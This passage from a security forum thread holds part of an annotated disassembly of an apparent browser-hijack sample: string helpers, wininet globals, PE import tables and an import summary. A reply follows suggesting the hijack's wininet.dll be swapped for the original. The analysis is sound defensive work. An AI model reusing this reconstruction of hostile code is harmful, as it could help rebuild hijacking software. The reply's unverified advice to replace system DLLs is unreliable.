      ;------------------------------------------------------------------------------
      ; BOOL SUB_L00401870(void *p)
      ; HeapFree(GetProcessHeap(), 0, p); counterpart of SUB_L00401850. cdecl: the
      ; caller pops the argument. Result is never checked by the callers.
      ;------------------------------------------------------------------------------
      SUB_L00401870:
      mov eax,[esp+04h]                ; p
      push eax
      push 00000000h                   ; dwFlags
      call [KERNEL32.dll!GetProcessHeap]
      push eax
      call [KERNEL32.dll!HeapFree]
      retn
      ;------------------------------------------------------------------------------
      Align 16
      ;------------------------------------------------------------------------------
      ; char *SUB_L00401890(const char *s, const char *needle)   -- strstr()
      ; Returns a pointer into s at the first occurrence of needle, s itself when
      ; needle is "", NULL when not found. Byte-wise, case-sensitive comparison.
      ; ABI:   cdecl, 2 args; caller pops (add esp,8)
      ; Uses:  eax = current start position in s, edi = needle, ecx = cursor in
      ;        needle, esi = eax - edi so that [esi+ecx] is the matching byte of s
      ;------------------------------------------------------------------------------
      SUB_L00401890:
      push ebx
      push esi
      mov eax,[esp+0Ch]                ; eax = s
      push edi
      mov edi,[esp+14h]                ; edi = needle
      cmp byte ptr [edi],00h
      jz L004018D9                     ; empty needle -> return s
      mov dl,[eax]
      test dl,dl
      jz L004018D7                     ; empty s -> NULL
      L004018A6:                       ; outer loop: try a match at eax
      test dl,dl
      mov ecx,edi
      jz L004018CA
      mov esi,eax
      sub esi,edi                      ; [esi+ecx] walks s in step with ecx
      L004018B0:                       ; inner loop: compare byte by byte
      mov dl,[ecx]
      test dl,dl
      jz L004018CA                     ; needle exhausted -> match
      movsx ebx,[esi+ecx]
      movsx edx,dl
      sub ebx,edx
      jnz L004018CA                    ; mismatch
      mov dl,[esi+ecx+01h]
      inc ecx
      test dl,dl
      jnz L004018B0
      L004018CA:
      cmp byte ptr [ecx],00h
      jz L004018D9                     ; whole needle matched -> return eax
      mov dl,[eax+01h]
      inc eax                          ; advance start position
      test dl,dl
      jnz L004018A6
      L004018D7:
      xor eax,eax                      ; not found
      L004018D9:
      pop edi
      pop esi
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      Align 4
      ;------------------------------------------------------------------------------
      ; char *SUB_L004018E0(const char *s, char c)   -- strchr()
      ; Scans s for c; as in C strchr, c == 0 matches the terminator. Returns the
      ; pointer in eax or NULL, selected without a branch at the end:
      ;   eax = (*ecx != c) - 1   -> 0 on mismatch, -1 on match;   eax &= ecx
      ; ABI:   cdecl, 2 args; caller pops. Used by SUB_L004013D0 on the language
      ;        table at L00401074.
      ;------------------------------------------------------------------------------
      SUB_L004018E0:
      mov ecx,[esp+04h]                ; ecx = s
      mov dl,[esp+08h]                 ; dl = c
      mov al,[ecx]
      test al,al
      jz L004018FA
      L004018EE:
      cmp al,dl
      jz L004018FA                     ; found
      mov al,[ecx+01h]
      inc ecx
      test al,al
      jnz L004018EE
      L004018FA:                       ; ecx -> match or terminator
      push ebx
      mov bl,[ecx]
      xor eax,eax
      cmp bl,dl
      setnz al                         ; 1 if no match
      dec eax                          ; 0 if no match, -1 if match
      pop ebx
      and eax,ecx                      ; NULL or ecx
      retn
      ;------------------------------------------------------------------------------
      Align 8
      ;------------------------------------------------------------------------------
      ; Writable globals. The first three are wininet.dll function pointers filled in
      ; by SUB_L00401340 with GetProcAddress and called by SUB_L00401460.
      ;------------------------------------------------------------------------------
      L00401910:
      dd 00000000h                     ; FindNextUrlCacheEntryA
      L00401914:
      dd 00000000h                     ; FindFirstUrlCacheEntryA
      L00401918:
      db 00h;  FindCloseUrlCache
      db 00h;
      db 00h;
      db 00h;
      ; L0040191C: four zero bytes; SUB_L00401600 passes this address to
      ; ShellExecuteA as the empty lpDirectory string.
      L0040191C:
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      ;------------------------------------------------------------------------------
      ; Import directory, located in .text. Five IMAGE_IMPORT_DESCRIPTOR entries of
      ; five dwords each (OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name,
      ; FirstThunk; RVAs relative to image base 00400000h), the last one all zero;
      ; then the import name tables (RVAs of hint/name entries, zero-terminated per
      ; DLL); then the hint/name entries (dw hint, NUL-terminated function name) and
      ; the DLL names. FirstThunk points at the IAT slots at the top of this section
      ; (00401000h ADVAPI32, 00401010h KERNEL32, 00401060h SHELL32, 00401068h USER32).
      ;------------------------------------------------------------------------------
      dd 00001994h                     ; descriptor 1: names 401994h, 'KERNEL32.dll' (401B14h), IAT 401010h
      dd 00000000h
      dd 00000000h
      dd 00001B14h
      dd 00001010h
      dd 000019ECh                     ; descriptor 2: names 4019ECh, 'USER32.dll' (401B48h), IAT 401068h
      dd 00000000h
      dd 00000000h
      dd 00001B48h
      dd 00001068h
      dd 00001984h                     ; descriptor 3: names 401984h, 'ADVAPI32.dll' (401B86h), IAT 401000h
      dd 00000000h
      dd 00000000h
      dd 00001B86h
      dd 00001000h
      dd 000019E4h                     ; descriptor 4: names 4019E4h, 'SHELL32.dll' (401BA4h), IAT 401060h
      dd 00000000h
      dd 00000000h
      dd 00001BA4h
      dd 00001060h
      dd 00000000h                     ; null descriptor ends the array
      dd 00000000h
      dd 00000000h
      dd 00000000h
      dd 00000000h
      dd 00001B62h                     ; ADVAPI32 names: RegOpenKeyExA, RegCloseKey, RegQueryValueExA
      dd 00001B54h
      dd 00001B72h
      dd 00000000h
      dd 00001A52h                     ; KERNEL32 names, 19 entries in the IAT's order (GetTickCount first)
      dd 00001A62h
      dd 00001A6Eh
      dd 00001A7Eh
      dd 00001A98h
      dd 00001AAEh
      dd 00001A46h
      dd 00001AC8h
      dd 00001AD4h
      dd 00001AE2h
      dd 00001AEAh
      dd 00001AF6h
      dd 00001B08h
      dd 00001A34h
      dd 00001A28h
      dd 00001A18h
      dd 00001A06h
      dd 00001ABAh
      dd 000019F8h
      dd 00000000h
      dd 00001B94h                     ; SHELL32 names: ShellExecuteA
      dd 00000000h
      dd 00001B22h                     ; USER32 names: GetKeyboardLayoutList, MessageBoxA
      dd 00001B3Ah
      dd 00000000h
      ; Hint/name entries start here (RVA 19F8h); the db 00h lines are word padding.
      dw 00E5h
      db 'FreeLibrary',0
      dw 0189h
      db 'GetProcAddress',0
      db 00h
      dw 022Eh
      db 'LoadLibraryA',0
      db 00h
      dw 00C1h
      db 'FindClose',0
      dw 00C5h
      db 'FindFirstFileA',0
      db 00h
      dw 0398h
      db 'lstrcpyA',0
      db 00h
      dw 01BEh
      db 'GetTickCount',0
      db 00h
      dw 039Eh
      db 'lstrlenA',0
      db 00h
      dw 01B6h
      db 'GetTempPathA',0
      db 00h
      dw 0142h
      db 'GetEnvironmentVariableA',0
      dw 0165h
      db 'GetModuleFileNameA',0
      db 00h
      dw 038Fh
      db 'lstrcatA',0
      db 00h
      dw 002Ch
      db 'CloseHandle',0
      dw 0376h
      db 'WriteFile',0
      dw 004Ah
      db 'CreateFileA',0
      dw 0329h
      db 'Sleep',0
      dw 01EFh
      db 'HeapAlloc',0
      dw 018Bh
      db 'GetProcessHeap',0
      db 00h
      dw 01F5h
      db 'HeapFree',0
      db 00h
      db 'KERNEL32.dll',0              ; DLL name referenced by descriptor 1
      db 00h
      dw 0123h
      db 'GetKeyboardLayoutList',0
      dw 01DCh
      db 'MessageBoxA',0
      db 'USER32.dll',0                ; descriptor 2
      db 00h
      dw 01C8h
      db 'RegCloseKey',0
      dw 01E1h
      db 'RegOpenKeyExA',0
      dw 01EBh
      db 'RegQueryValueExA',0
      db 00h
      db 'ADVAPI32.dll',0              ; descriptor 3
      db 00h
      dw 0098h
      db 'ShellExecuteA',0
      db 'SHELL32.dll',0               ; descriptor 4
      ;------------------------------------------------------------------------------
      00000050h DUP (??)               ; 50h trailing bytes with no initialized content
      ;
      ;
      ;------------------------------------------------------------------------------
      ; Import summary emitted by PE Explorer for the tables above. Taken together
      ; the imports are the sample's full static capability: read-only registry
      ; access, IE cache enumeration (wininet, loaded at run time), temp-file
      ; creation, a MessageBox and ShellExecuteA. Network access happens only
      ; indirectly, by handing a URL to ShellExecuteA; there is no service, driver,
      ; process-injection or persistence API here.
      ;------------------------------------------------------------------------------
      ; Imports from KERNEL32.dll
      ;
      extrn GetTickCount
      extrn lstrlenA
      extrn GetTempPathA
      extrn GetEnvironmentVariableA
      extrn GetModuleFileNameA
      extrn lstrcatA
      extrn lstrcpyA
      extrn WriteFile
      extrn CreateFileA
      extrn Sleep
      extrn HeapAlloc
      extrn GetProcessHeap
      extrn HeapFree
      extrn FindFirstFileA
      extrn FindClose
      extrn LoadLibraryA
      extrn GetProcAddress
      extrn CloseHandle
      extrn FreeLibrary
      ;
      ; Imports from USER32.dll
      ;
      extrn GetKeyboardLayoutList
      extrn MessageBoxA
      ;
      ; Imports from ADVAPI32.dll
      ;
      extrn RegOpenKeyExA
      extrn RegCloseKey
      extrn RegQueryValueExA
      ;
      ; Imports from SHELL32.dll
      ;
      extrn ShellExecuteA
      ;
      ;------------------------------------------------------------------------------

    Hope someone will find this useful.

    Regards
     
  2. ArcdEvilz

    ArcdEvilz Registered Member

    Joined:
    Apr 25, 2004
    Posts:
    2
    I noticed this hijack uses wininet.dll. By default this DLL is 585K and the one from this hijack is 475K. I'm not sure how it fits into the scope of the hijack, but I replaced mine with the original one. This hijack is a booger; someone find a fix.
     